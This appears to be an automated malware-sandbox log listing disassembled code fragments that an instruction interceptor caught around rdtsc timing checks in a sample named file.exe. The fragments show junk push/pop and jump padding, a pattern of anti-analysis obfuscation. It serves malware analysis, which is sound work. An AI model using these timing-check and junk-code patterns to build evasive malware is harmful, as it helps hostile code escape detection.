Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FEA second address: A53FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F8A2C4FB2A2h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A570C5 second address: A570C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B5C6 second address: A5B5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B5CA second address: A5B5FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F8A2C7FDC27h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640B9 second address: A640BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640BD second address: A640C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640C3 second address: A640D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jp 00007F8A2C4FB296h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AFB3 second address: A6AFBD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AFBD second address: A6AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A38 second address: A73A4C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2C7FDC16h 0x00000008 jmp 00007F8A2C7FDC1Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FD4 second address: A71FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FDA second address: A71FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jne 00007F8A2C7FDC16h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FEB second address: A71FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8A2C4FB296h 0x0000000a jno 00007F8A2C4FB296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FFB second address: A71FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FFF second address: A72025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8A2C4FB296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72345 second address: A7235B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F8A2C7FDC16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F8A2C7FDC16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7235B second address: A7235F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7235F second address: A7238A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F8A2C7FDC29h 0x00000010 js 00007F8A2C7FDC16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72777 second address: A72787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8A2C4FB296h 0x0000000a jnp 00007F8A2C4FB296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72787 second address: A727AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Eh 0x00000007 jmp 00007F8A2C7FDC21h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727AD second address: A727B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727B3 second address: A727D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC25h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727D4 second address: A727EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8A2C4FB296h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F8A2C4FB296h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727EA second address: A727F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A727F0 second address: A727F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7299F second address: A729A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B15 second address: A72B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B1B second address: A72B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jbe 00007F8A2C7FDC16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B2B second address: A72B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B35 second address: A72B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC1Bh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B49 second address: A72B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C4FB2A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72B5F second address: A72B7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8A2C7FDC16h 0x00000008 jmp 00007F8A2C7FDC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7370B second address: A7370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7370F second address: A73713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76071 second address: A76088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8A2C4FB296h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F8A2C4FB296h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7982C second address: A79847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC22h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79847 second address: A7984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7984D second address: A7986B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8A2C7FDC1Dh 0x0000000b jnp 00007F8A2C7FDC16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7986B second address: A7986F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7986F second address: A79879 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2C7FDC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E2FD second address: A7E301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91111 second address: A9113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8A2C7FDC21h 0x0000000b popad 0x0000000c jmp 00007F8A2C7FDC22h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9113E second address: A91148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90F92 second address: A90F9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93115 second address: A93119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975F0 second address: A975F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A975F6 second address: A97634 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A2C4FB2B3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8A2C4FB2ACh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8A2C4FB29Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B27B second address: A9B285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B285 second address: A9B289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B289 second address: A9B294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B535 second address: A9B546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F8A2C4FB29Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA02BB second address: AA02C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08E5 second address: AA08F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08F8 second address: AA094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8A2C7FDC18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov edx, 2ED84E2Fh 0x0000002a mov dword ptr [ebp+122D2166h], eax 0x00000030 push dword ptr [ebp+122D25C0h] 0x00000036 mov dword ptr [ebp+122D2166h], eax 0x0000003c call 00007F8A2C7FDC19h 0x00000041 jo 00007F8A2C7FDC20h 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA094B second address: AA095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007F8A2C4FB296h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA095E second address: AA0979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8A2C7FDC1Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0979 second address: AA097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA097D second address: AA09AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC28h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA09AE second address: AA09B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA09B7 second address: AA09BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24B6 second address: AA24BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24BC second address: AA24C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA24C2 second address: AA24D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8A2C4FB29Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA20C4 second address: AA20CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3FA3 second address: AA3FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908D6 second address: 4D908DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908DC second address: 4D908F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, 49h 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 45D856C7h 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908F8 second address: 4D90927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5DF475EAh 0x00000008 mov dx, 06B6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f call dword ptr [7598188Ch] 0x00000015 mov edi, edi 0x00000017 push ebp 0x00000018 mov ebp, esp 0x0000001a push ecx 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000021 mov dword ptr [ebp-04h], ecx 0x00000024 cmp ecx, 01000000h 0x0000002a jc 00007F8A2C82F6F5h 0x00000030 mov eax, 7FFE0320h 0x00000035 mov eax, dword ptr [eax] 0x00000037 mul ecx 0x00000039 shrd eax, edx, 00000018h 0x0000003d mov esp, ebp 0x0000003f pop ebp 0x00000040 ret 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8A2C7FDC28h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90927 second address: 4D9092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9092D second address: 4D9081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c jmp 00007F8A2C7FDC1Eh 0x00000011 ret 0x00000012 nop 0x00000013 xor esi, eax 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 push eax 0x00000019 call 00007F8A3118B50Dh 0x0000001e mov edi, edi 0x00000020 jmp 00007F8A2C7FDC22h 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov cl, EDh 0x00000029 call 00007F8A2C7FDC23h 0x0000002e mov esi, 3A82618Fh 0x00000033 pop esi 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F8A2C7FDC21h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710C8 second address: 4D710CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710CC second address: 4D710DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710DC second address: 4D71155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2C4FB2A0h 0x00000013 and esi, 5058EBB8h 0x00000019 jmp 00007F8A2C4FB29Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [esi] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F8A2C4FB2A4h 0x00000029 sbb ch, 00000018h 0x0000002c jmp 00007F8A2C4FB29Bh 0x00000031 popfd 0x00000032 mov esi, 4F9429CFh 0x00000037 popad 0x00000038 mov dword ptr [edx], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A2C4FB2A1h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71155 second address: 4D711D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f mov edi, 002F3BECh 0x00000014 popad 0x00000015 mov dword ptr [edx+04h], eax 0x00000018 jmp 00007F8A2C7FDC1Bh 0x0000001d mov eax, dword ptr [esi+08h] 0x00000020 jmp 00007F8A2C7FDC26h 0x00000025 mov dword ptr [edx+08h], eax 0x00000028 jmp 00007F8A2C7FDC20h 0x0000002d mov eax, dword ptr [esi+0Ch] 0x00000030 jmp 00007F8A2C7FDC20h 0x00000035 mov dword ptr [edx+0Ch], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8A2C7FDC1Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711D4 second address: 4D711D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711D8 second address: 4D711DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D711DE second address: 4D7127F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c jmp 00007F8A2C4FB2A0h 0x00000011 mov dword ptr [edx+10h], eax 0x00000014 pushad 0x00000015 mov bl, ah 0x00000017 mov bx, B5BEh 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+14h] 0x0000001f pushad 0x00000020 movsx ebx, ax 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 mov dword ptr [edx+14h], eax 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8A2C4FB2A5h 0x00000030 sub esi, 51703FF6h 0x00000036 jmp 00007F8A2C4FB2A1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F8A2C4FB2A0h 0x00000042 adc cx, 3918h 0x00000047 jmp 00007F8A2C4FB29Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [esi+18h] 0x00000051 pushad 0x00000052 mov al, 52h 0x00000054 mov ch, dl 0x00000056 popad 0x00000057 mov dword ptr [edx+18h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7127F second address: 4D71294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71294 second address: 4D7129A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7129A second address: 4D7129E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71399 second address: 4D713E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F8A2C4FB2A3h 0x0000000b add cl, FFFFFFDEh 0x0000000e jmp 00007F8A2C4FB2A9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+28h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8A2C4FB29Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D713E4 second address: 4D7147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A2C7FDC27h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8A2C7FDC29h 0x0000000f adc ecx, 26D86326h 0x00000015 jmp 00007F8A2C7FDC21h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [edx+28h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 mov ah, bh 0x00000025 pop eax 0x00000026 pushfd 0x00000027 jmp 00007F8A2C7FDC25h 0x0000002c and esi, 56CB0336h 0x00000032 jmp 00007F8A2C7FDC21h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ecx, dword ptr [esi+2Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8A2C7FDC1Dh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7147D second address: 4D71483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
